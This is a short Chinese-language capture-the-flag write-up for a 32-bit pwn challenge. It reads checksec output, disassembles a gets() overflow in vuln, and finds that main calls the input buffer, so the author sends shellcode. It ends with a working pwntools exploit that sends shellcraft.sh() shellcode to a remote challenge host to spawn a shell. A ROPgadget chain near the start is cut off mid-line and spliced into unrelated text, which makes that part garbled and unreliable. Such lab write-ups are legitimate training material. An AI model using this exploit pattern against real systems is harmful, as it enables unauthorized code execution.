Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
32位,啥都没开
这个看着挺大的,直接来个ROPchain,
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = ''
p += pack('还真有
,然后让我看看溢出点
main函数无法编译,(得看汇编了
(但是我们可以反汇编vuln函数
int __cdecl vuln(int a1)
{
gets(a1);
return puts(a1);
}
vuln很简单,但是a1在栈中的位置
我们看看main传了什么进去
.text:080488F2 add esp, 10h
.text:080488F5 sub esp, 0Ch
.text:080488F8 lea eax, [ebp+var_A0]
.text:080488FE push eax
.text:080488FF call vuln
把var_A0传入,也就是我们输入的位置,从var_A0开始写入
在观察一下main的汇编
发现一个东西
.text:08048914 add esp, 10h
.text:08048917 lea eax, [ebp+var_A0]
.text:0804891D call eax
.text:0804891F mov eax, 0
.text:08048924 mov ecx, [ebp+var_4]
.text:08048927 leave
在main的后面有个call var_A0也就是说,我们写的东西能直接执行,并且也没开NX
直接写shellcode
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25457,"./pwn",0)
context(os='linux', arch='i386',log_level='debug')
sl(asm(shellcraft.sh()))
ia()
